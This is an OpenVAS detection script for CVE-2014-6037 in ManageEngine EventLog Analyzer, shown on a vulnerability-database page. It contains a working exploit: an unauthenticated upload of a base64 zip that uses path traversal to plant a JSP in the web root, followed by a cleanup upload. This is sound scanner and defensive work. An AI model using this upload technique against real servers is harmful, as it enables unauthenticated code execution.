Lucene search
+L

ManageEngine EventLog Analyzer Multiple Security Vulnerabilities

🗓️ 09 Sep 2014 00:00:00Reported by Copyright (C) 2014 Greenbone AGType 
openvas
 openvas
🔗 plugins.openvas.org👁 33 Views

ManageEngine EventLog Analyzer vulnerabilities, arbitrary file upload, unauthorized acces

Related
Refs
Code
# SPDX-FileCopyrightText: 2014 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

CPE = "cpe:/a:zohocorp:manageengine_eventlog_analyzer";

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.105083");
  script_cve_id("CVE-2014-6037");
  script_tag(name:"cvss_base", value:"7.5");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_version("2026-04-22T06:16:44+0000");

  script_tag(name:"solution_type", value:"VendorFix");

  script_name("ManageEngine EventLog Analyzer Multiple Security Vulnerabilities");

  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/69482");
  script_xref(name:"URL", value:"http://www.manageengine.com/products/eventlog/");
  script_xref(name:"URL", value:"https://www.mogwaisecurity.de/advisories/MSA-2014-01.txt");

  script_tag(name:"impact", value:"Attackers can exploit these issues to execute arbitrary code and gain
unauthorized access to the critical sections of the application.");

  script_tag(name:"vuldetect", value:"Upload a special crafted zip file and check if /openvas.jsp exist afterwards and contains an expected string.");

  script_tag(name:"insight", value:"1)Unauthenticated remote code execution
ME EventLog Analyzer contains a 'agentUpload' servlet which is used by Agents
to send log data as zip files to the central server. Files can be uploaded
without authentication and are stored/decompressed in the 'data' subdirectory.

As the decompress procedure is handling the file names in the ZIP file in a
insecure way it is possible to store files in the web root of server. This can
be used to upload/execute code with the rights of the application server.

2) Authorization issues
The EventLog Analyzer web interface does not check if an authenticated has
sufficient permissions to access certain parts of the application. A low
privileged user (for example guest) can therefore access critical sections of the web
interface, by directly calling the corresponding URLs. This can be used to access the
database browser of the application which gives the attacker full access to the database.");

  script_tag(name:"solution", value:"Ask the Vendor for an update. Workaround:

1) Unauthenticated remote code execution

If agents are not used to collect log information, access to the servlet can be disabled by commenting out the
following lines in the web.xml file (webapps/event/WEB-INF/web.xml) and restart the service.

<servlet>
        <servlet-name>agentUpload</servlet-name>
        <servlet-class>com.adventnet.sa.agent.UploadHandlerServlet</servlet-class>
</servlet>
<servlet-mapping>
        <servlet-name>agentUpload</servlet-name>
        <url-pattern>/agentUpload</url-pattern>
</servlet-mapping>


2) Authorization issues

No workaround, reduce the attack surface by disabling unused low privileged accounts like 'guest'.");

  script_tag(name:"summary", value:"ManageEngine EventLog Analyzer is prone to an arbitrary file-upload
vulnerability and an unauthorized-access vulnerability.");

  script_tag(name:"affected", value:"EventLog Analyzer 9.9 Build 9002 and prior are vulnerable.");

  script_tag(name:"last_modification", value:"2026-04-22 06:16:44 +0000 (Wed, 22 Apr 2026)");
  script_tag(name:"creation_date", value:"2014-09-09 12:16:43 +0200 (Tue, 09 Sep 2014)");
  script_category(ACT_ATTACK);
  script_family("Web application abuses");
  script_copyright("Copyright (C) 2014 Greenbone AG");
  script_dependencies("gb_manageengine_eventlog_analyzer_http_detect.nasl");
  script_mandatory_keys("manageengine/eventlog_analyzer/http/detected");
  script_require_ports("Services/www", 8400);

  script_tag(name:"qod_type", value:"remote_app");

  exit(0);
}

include("host_details.inc");
include("misc_func.inc");
include("http_func.inc");
include("http_keepalive.inc");

if (!port = get_app_port(cpe: CPE, service: "www"))
  exit(0);

if (!get_app_location(cpe: CPE, port: port, nofork: TRUE))
  exit(0);

useragent = http_get_user_agent();
host = http_host_name(port: port);

function _send( data )
{
  if( ! data ) return;

  data =  base64_decode( str:data );

  ex = '\r\n' +
       '------------------------------d781b0329289\r\n' +
       'Content-Disposition: form-data; name="payload"; filename="evil.zip"\r\n' +
       'Content-Type: application/octet-stream\r\n' +
       '\r\n' +
       data +
       '\r\n' +
       '------------------------------d781b0329289--';

len = strlen( ex );

req = 'POST /agentUpload HTTP/1.1\r\n' +
      'User-Agent: ' + useragent + '\r\n' +
      'Host: ' + host + '\r\n' +
      'Accept: */*\r\n' +
      'Content-Length: ' + len + '\r\n' +
      'Expect: 100-continue\r\n' +
      'Content-Type: multipart/form-data; boundary=----------------------------d781b0329289\r\n' +
      ex;

     result = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );

     if( ! result ) return;

     return result;
}

# evil.zip -> openvas.jsp -> <%= new String("OpenVAS RCE Test") %>
zip        = 'UEsDBBQAAAAAADZcKUVt2hsLJgAAACYAAAAfAAAALi4vLi4vd2ViYXBwcy9ldmVudC9vcGVudmFzLmpzcDwlP' +
             'SBuZXcgU3RyaW5nKCJPcGVuVkFTIFJDRSBUZXN0IikgJT4KUEsBAhQDFAAAAAAANlwpRW3aGwsmAAAAJgAAAB' +
             '8AAAAAAAAAAAAAAKSBAAAAAC4uLy4uL3dlYmFwcHMvZXZlbnQvb3BlbnZhcy5qc3BQSwUGAAAAAAEAAQBNAAA' +
             'AYwAAAAAA';
# evil.zip -> openvas.jsp -> -
zip_clean = 'UEsDBBQAAAAAAFpdKUWQvFEqKgAAACoAAAAfAAAALi4vLi4vd2ViYXBwcy9ldmVudC9vcGVudmFz' +
            'LmpzcDwlPSBuZXcgU3RyaW5nKCJPcGVuVkFTIFRFU1QgRk9SIFJDRSIpICU+ClBLAwQUAAAAAACN' +
            'ZSlFDqEmgQIAAAACAAAAHwAAAC4uLy4uL3dlYmFwcHMvZXZlbnQvb3BlbnZhcy5qc3AtClBLAQIU' +
            'AxQAAAAAAFpdKUWQvFEqKgAAACoAAAAfAAAAAAAAAAAAAACkgQAAAAAuLi8uLi93ZWJhcHBzL2V2' +
            'ZW50L29wZW52YXMuanNwUEsBAhQDFAAAAAAAjWUpRQ6hJoECAAAAAgAAAB8AAAAAAAAAAAAAAKSB' +
            'ZwAAAC4uLy4uL3dlYmFwcHMvZXZlbnQvb3BlbnZhcy5qc3BQSwUGAAAAAAIAAgCaAAAApgAAAAAA';

buf = _send( data:zip );
if( isnull( buf ) ) exit( 99 );

url = "/openvas.jsp";
req = http_get( item:url, port:port );
buf = http_send_recv( port:port, data:req, bodyonly:FALSE );

if( "OpenVAS RCE Test" >< buf )
{
  report = 'By uploading a special crafted zip file, the file "/openvas.jsp" was created. Please delete this file.';
  security_message( port:port, data:report );
  _send( data:zip_clean );
  exit( 0 );
}

exit( 99 );

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

22 Apr 2026 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.84182
33